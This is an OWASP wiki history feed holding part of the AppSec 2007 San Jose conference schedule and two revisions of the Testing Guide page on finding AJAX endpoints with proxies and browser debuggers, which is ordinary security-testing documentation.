 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:00-09:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Coffee&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:00-09:10 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Welcome to OWASP &amp;amp; WASC AppSec 2007 Conference: Dave Wichers, OWASP Conferences Chair and COO Aspect Security ([http://www.owasp.org/images/e/e7/OWASP-WASCAppSec2007SanJose_Intro-Final.ppt ppt])&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:10-10:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Keynote: eBay Application Security Program – Dave Cullinane, CISO - eBay and Michael Barrett, CISO - PayPal [Softcopy not available]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | An Introduction to WASC and its projects ([http://www.owasp.org/images/1/1d/OWASP-WASCAppSec2007SanJose_WASCIntro.pdf pdf])– Jeremiah Grossman, CTO, WhiteHat Security&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Using OWASP ([http://www.owasp.org/downloads/Using_OWASP.ppt VERY LARGE - 66MB - ppt]), Jeff Williams, OWASP Chair and CEO - Aspect Security&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:00-11:20 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:20-12:20 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | For my next trick... hacking Web 2.0 (lite) – Petko D. Petkov (AKA PDP Architect), Senior Security Researcher. Full version presented at OWASP Day Sept 2007 in Brussels ([http://www.owasp.org/images/0/02/OWASP_Day_Belgium_2007-pdp.ppt ppt])&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | Backdoors and other Developer Introduced 'Features', Chris Wysopal, CTO Veracode&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:20-13:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:45-14:30 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | CSRF: Danger, Detection, and Defenses – Introducing two new OWASP CSRF Tools, Eric Sheridan, Application Security Consultant, Aspect Security and OWASP CSRF Guard Project Lead ([http://www.owasp.org/images/c/c9/CSRF_DangerDetectionDefenses.ppt ppt])&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | WASC Distributed Open Proxy Honeypot Project, Ryan Barnett, WASC Open Proxy Honeypot Project Lead, Breach Security&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:30-15:10 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | Defeating Web 2.0 Attacks without Recoding Applications, Amichai Shulman ([http://www.owasp.org/images/4/41/OWASP-WASCAppSec2007SanJose_DefeatWeb2.0Attacks.ppt ppt]), CTO, Imperva&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | Dangers of Third Party Content, Tom Stripling, Senior Security Consultant - Security PS ([http://www.owasp.org/images/6/6d/OWASP-WASCAppSec2007SanJose_Dangers_of3rdPartyContent.ppt ppt])&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:10-15:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:30-16:40 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Projects Overview, Dinis Cruz, Chief OWASP Evangelist&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | Web Browser (In)-Security - &amp;quot;Past, Present, and Future&amp;quot;, Robert &amp;quot;RSnake&amp;quot; Hansen, CEO SecTheory&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:40-17:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:00-18:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: “Building an Effective Application Security Assurance Program”&lt;br /&gt;
Moderator: Brian Bertacini, Sr. Manager, AppSec Consulting&lt;br /&gt;
&lt;br /&gt;
Panelists: Jeff Williams - CEO Aspect Security, Andy Steingruebl - Principal Security Engineer PayPal, Gary Terrell, Adobe Systems, Scott Stender, iSEC Partners, Neil Daswani, Google&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 18:00-19:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Leader Meeting [[7th_OWASP_AppSec_Conference_-_San_Jose_2007_/_OWASP_Leaders_Meeting_-_Nov_14_6pm|(see meeting agenda here)]] - Organized by Dinis Cruz&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 19:00-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks at Holiday Inn. (1740 N. 1st St. San Jose)&lt;br /&gt;
 |-&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | Day 2 - Nov 15, 2007&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Track 1: &lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Track 2: &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:00-09:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Coffee&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:00-9:50 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Keynote:  DTCC Application Security Program ([http://www.owasp.org/images/a/af/OWASP-WASCAppSec2007SanJose_AppSecDTCC.ppt ppt]), Jim Routh, CISO for the Depository Trust and Clearing Corporation (DTCC)&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 9:50-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP State of the Union ([http://www.owasp.org/images/e/e9/OWASP-WASCAppSec2007SanJose_OWASPStateoftheU.ppt ppt]), Dinis Cruz, Chief OWASP Evangelist&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-10:50 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:50-11:30 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | Finding Vulnerabilities in Flash Applications, Stefano Di Paola, CTO Minded Security ([http://www.owasp.org/images/d/df/SanJose_AppSec2007_DiPaola.ppt ppt])&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | Start Rolling with Rails Security, Corey Benninger, Principal Consultant, Intrepidus Group, Inc.&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:30-12:30 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Enterprise Security API (ESAPI) – Jeff Williams, CEO Aspect Security and OWASP Chair ([http://www.owasp.org/images/4/45/OWASP-WASCAppSec2007SanJose_OWASP_ESAPI_Overview.ppt ppt])&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | Securing Java Server Faces against the OWASP Top 10 ([http://www.owasp.org/images/0/0d/OWASP-WASCAppSec2007SanJose_SecuringJSFApps_OWASPTop10.ppt ppt]), David Chandler, Web Architect, Digital Insight&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:30-13:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:45-14:30 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | The MySpace Worm, by its author: Samy Kamkar ([http://www.owasp.org/images/7/79/OWASP-WASCAppSec2007SanJose_SamyWorm.ppt ppt])&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | .Net Web Services Hacking - Scan, Attacks and Defense, Sheeraj Shah, Blueinfy&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:30-15:20 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | OWASP SpoC Project: Anti Samy - Picking a Fight with XSS ([http://www.owasp.org/images/e/e9/OWASP-WASCAppSec2007SanJose_AntiSamy.ppt ppt]), Arshan Dabirsiaghi, Application Security Engineer, Aspect Security&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | Website Vulnerability Statistics, Arian Evans (Director of Operations, WhiteHat Security)&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:20-15:40 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:40-16:30 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | The PKI Lie – Attacking Certificate-Based Authentication ([http://www.owasp.org/images/c/c4/OWASP-WASCAppSec2007SanJose_PKILie.ppt ppt]), Ofer Maor, CTO Hacktics&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | Session Management Security and Assessment Techniques, Tom Stracener, Sr. Security Analyst, Cenzic&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Responsible &amp;quot;Website&amp;quot; Vulnerability Disclosure&lt;br /&gt;
Moderator: Anurag Agarwal&lt;br /&gt;
&lt;br /&gt;
Panelists: Robert &amp;quot;RSnake&amp;quot; Hansen, CEO SecTheory; Bruce Lowenthal, Director of Oracle Security Alerts Group, Oracle; Zulfikar Ramzan, Advanced Threat Team, Symantec; Christopher Ernst, US Secret Service; and Katie Moussouris, Security Strategist, Microsoft&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Outsourcing: Financial Dream or Security Nightmare?&lt;br /&gt;
Moderator: Rohyt Belani, Managing Partner, Intrepidus Group&lt;br /&gt;
&lt;br /&gt;
Panelists: Claire McDonough - Security Program Manager at Google, Renato Delatorre – Director of Network Security &amp;amp; Risk Management for Verizon Wireless, Jaswinder Hayre - Application Security Manager for HBO&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-17:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up - Dave Wichers, OWASP Conferences Chair ([http://www.owasp.org/images/e/e7/OWASP-WASCAppSec2007SanJose_Intro-Final.ppt ppt])&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 18:30-20:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Microsoft and Aspect Security Cosponsored Cocktail Party: Drinks at Holiday Inn. (1740 N. 1st St. San Jose)&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Nov 14: Track 3: Web Services Security ==&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | Day 1 - Nov 14, 2007&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:80%; background:#BC857A&amp;quot; | Track 3:  Web Services Security&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:10-11:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:30-12:30 || style=&amp;quot;width:80%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | The Top 10 Web Services Security Issues ([http://www.owasp.org/images/2/2f/OWASP-WASCAppSec2007SanJose_Top10WebServicesIssues.ppt ppt]), Gunnar Peterson, Principle, Arctec Group&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:30-13:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:45-14:30 || style=&amp;quot;width:80%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | Centralized, Dynamic Web Services Security and Policy Management, Richard Salz, IBM&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:30-15:10 || style=&amp;quot;width:80%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | Covert CDATA Channels, XML Bombs, and Unexpected Attachments: Case Notes from a real-life XML Web Services Vulnerability Assessment, Mark O'Neill, CTO Vordel&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:10-15:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:30-16:40 || style=&amp;quot;width:80%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | Attacking XML Security, Brad Hill, Principal Security Consultant, iSEC Partners&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=14481</id>
		<title>AJAX How to test AoC</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=14481"/>
				<updated>2006-12-18T20:47:02Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities.  The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Traditional web applications are fairly easy to discover in an automated fashion.  An application typically has one or more pages that are connected by HREFs or other links.  Interesting pages will have one or more HTML FORMs.  These forms will have one or more parameters.  By using simple spidering techniques such as looking for anchor (A) tags and HTML FORMs it should be possible to discover all pages, forms, and parameters in a traditional web application.  Requests made to this application follow a well-known and consistent format laid out in the HTTP specification.  GET requests have the format:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://server.com/directory/resource.cgi?param1=value1&amp;amp;key=value&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
POST requests are sent to URLs in a similar fashion:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://server.com/directory/resource.cgi&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Data sent to POST requests is encoded in a similar format and included in the request after the headers:&lt;br /&gt;
&lt;br /&gt;
 param1=value1&amp;amp;key=value&lt;br /&gt;
&lt;br /&gt;
Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer.  Therefore to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid.  Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for AJAX Endpoints:''' &amp;lt;br&amp;gt;&lt;br /&gt;
Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated.  See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered.  For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.&lt;br /&gt;
&lt;br /&gt;
The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side.  The drawback is that manually reviewing HTML and JavaScript content is tedious and, more importantly, the location and format of server-side URLs available to be accessed by AJAX calls are framework dependent.&lt;br /&gt;
&lt;br /&gt;
The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure.  Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts.  Also, by knowing the names of included JavaScript files, the tester can determine which AJAX frameworks appear to be in use.  Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasPage.PNG]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in.  The disadvantage is that only the endpoints that the application actually makes calls to will be revealed.  The tester must fully exercise the remote application, and even then there could be additional call endpoints that are available but not actively in use.  In exercising the application, the proxy should observe traffic to both the user-viewable pages and the background asynchronous traffic to the AJAX endpoints.  Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Image:ExampleAtlasRequest.jpg]]&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
By enumerating the AJAX endpoints available in an application and determining the required request format, the tester can set the stage for further analysis of the application.  Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Intercepting and debugging js code with Browsers'''&lt;br /&gt;
&lt;br /&gt;
By Using normal browsers it's possible to &lt;br /&gt;
analyze into detail js based web applications. &amp;lt;br&amp;gt;&lt;br /&gt;
Ajax calls in firefox can be intercepted by using &lt;br /&gt;
extension plugins that monitor the code flow. &amp;lt;br&amp;gt;&lt;br /&gt;
Two extensions providing this ability are &amp;quot;FireBug&amp;quot; and&lt;br /&gt;
&amp;quot;Venkman JavaScript Debugger&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
For Internet Explorer are available some tools &lt;br /&gt;
provided by Microsoft like &amp;quot;script Debugger&amp;quot;, &lt;br /&gt;
that permits real-time js debugging.&lt;br /&gt;
&lt;br /&gt;
By using Firebug on a page, a tester could find Ajax endpoints&lt;br /&gt;
by setting &amp;quot;Options-&amp;gt;Show XmlHttpRequest&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug1.jpg]]&lt;br /&gt;
&lt;br /&gt;
From now on, any request accomplished by XMLHttpRequest object will be listed on the bottom of&lt;br /&gt;
the browser.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On the right of the Url is displayed source script and line from &lt;br /&gt;
where the call was done and by clicking on the displayed Url,&lt;br /&gt;
server response is shown.&amp;lt;br&amp;gt;&lt;br /&gt;
So it's straightforward to understand where the request is done,&lt;br /&gt;
what was the response and where is the endpoint. &amp;lt;br&amp;gt;&lt;br /&gt;
If the link to source script is clicked, the tester could find where the request originated.&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_2.jpg]]&lt;br /&gt;
&lt;br /&gt;
As debugging Javascript is the way to learn how scripts build&lt;br /&gt;
urls, and how many parameters are available, by filling the form when the password is written down and the related input tag loses its focus, a new request is accomplished as could be seen on the following screenshot.&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_3.jpg]]&lt;br /&gt;
&lt;br /&gt;
Now, by clicking on the link to  js source code, the tester has access to the next endpoint.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_4.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Then by setting breakpoints on some lines near the javascript endpoint, it's easy to know the call stack as shown in the next screenshot.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:Firebug_5.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for AJAX Endpoints:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints, and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Knowledge of the frameworks being used and AJAX endpoints that are available helps the tester to focus his efforts and reduce the time required for discover and application footprinting.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [http://www.securityfocus.com/infocus/1879 Hacking Web 2.0 Applications with Firefox], Shreeraj Shah&lt;br /&gt;
* [http://www.securityfocus.com/infocus/1881 Vulnerability Scanning Web 2.0 Client-Side Components], Shreeraj Shah&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints, and fuzz those endpoints with framework-appropriate traffic.  At the current time, there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit), but ongoing development should increase the utility of the tool.&lt;br /&gt;
* '''Venkman''' &amp;lt;br&amp;gt; [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers.&lt;br /&gt;
* ''' Ghost Train'''&amp;lt;br&amp;gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and a test-generating and replaying add-on you can use with any web application.&lt;br /&gt;
* '''Squish/Web (froglogic)'''&lt;br /&gt;
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows you to record, edit, and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.&lt;br /&gt;
* '''JsUnit'''&amp;lt;br&amp;gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.&lt;br /&gt;
* '''Firebug'''&amp;lt;br&amp;gt;[https://addons.mozilla.org/firefox/1843/ FireBug] lets you explore the far corners of the DOM by keyboard or mouse. All of the tools you need to poke, prod, and monitor your JavaScript, CSS, HTML and Ajax are brought together into one seamless experience, including a debugger, an error console, command line, and a variety of fun inspectors.&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=14480</id>
		<title>AJAX How to test AoC</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&amp;diff=14480"/>
				<updated>2006-12-18T20:40:45Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities.  The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Traditional web applications are fairly easy to discover in an automated fashion.  An application typically has one or more pages that are connected by HREFs or other links.  Interesting pages will have one or more HTML FORMs.  These forms will have one or more parameters.  By using simple spidering techniques such as looking for anchor (A) tags and HTML FORMs it should be possible to discover all pages, forms, and parameters in a traditional web application.  Requests made to this application follow a well-known and consistent format laid out in the HTTP specification.  GET requests have the format:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://server.com/directory/resource.cgi?param1=value1&amp;amp;key=value&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
POST requests are sent to URLs in a similar fashion:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://server.com/directory/resource.cgi&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
